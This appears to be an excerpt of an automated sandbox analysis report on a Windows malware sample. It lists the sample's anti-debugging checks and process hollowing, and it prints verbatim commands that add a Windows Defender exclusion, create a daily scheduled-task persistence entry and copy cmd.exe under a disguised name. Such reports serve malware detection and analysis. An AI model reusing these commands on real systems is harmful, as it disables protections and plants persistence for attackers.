Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.0000000000694000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.000000000077A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1712292652.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2716618659.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2410341370.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1679864810.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1523809233.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2633471457.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1532040197.000000000066B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02D0F744
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process queried: DebugPort
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F02E37 IsDebuggerPresent, 7_2_00F02E37
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 13_2_004019F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02D0894C
Contains functionality to read the PEB
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0C1FA mov eax, dword ptr fs:[00000030h] 7_2_00F0C1FA
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00492B94 mov eax, dword ptr fs:[00000030h] 13_2_00492B94
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C1130 mov eax, dword ptr fs:[00000030h] 13_2_006C1130
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00703F3D mov eax, dword ptr fs:[00000030h] 13_2_00703F3D
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0C1FA mov eax, dword ptr fs:[00000030h] 15_2_00F0C1FA
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EEA9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW, 7_2_00EEA9D4
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process token adjusted: Debug
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF6EC0 SetUnhandledExceptionFilter, 7_2_00EF6EC0
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00EF6B40
Source: C:\Users\Public\Libraries\aymtmquJ.pif Code function: 11_1_00401475 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit, 11_1_00401475
Source: C:\Users\Public\Libraries\aymtmquJ.pif Code function: 11_1_004015D7 SetUnhandledExceptionFilter, 11_1_004015D7
Source: C:\Users\Public\Libraries\aymtmquJ.pif Code function: 11_1_004015D7 SetUnhandledExceptionFilter, 11_1_004015D7
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004123F1 SetUnhandledExceptionFilter, 13_2_004123F1
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00701361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00701361
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00704C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00704C7B
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF6EC0 SetUnhandledExceptionFilter, 15_2_00EF6EC0
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00EF6B40
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Memory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000 Jump to behavior
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Section unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Section unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 36F008 Jump to behavior
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 391008
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 20D008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006E8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW, 13_2_006E8550
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02CF5ACC
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: GetLocaleInfoA, 0_2_02CFA7C4
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02CF5BD8
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: GetLocaleInfoA, 0_2_02CFA810
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 7_2_00EE8572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 7_2_00EE6854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 7_2_00EE9310
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: GetLocaleInfoA, 13_2_00417A20
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 15_2_00EE8572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 15_2_00EE6854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 15_2_00EE9310
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\alg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\AppVClient.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTFF1C.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTFF2C.tmp VolumeInformation
Source: C:\Users\Public\Libraries\aymtmquJ.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\aymtmquJ.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
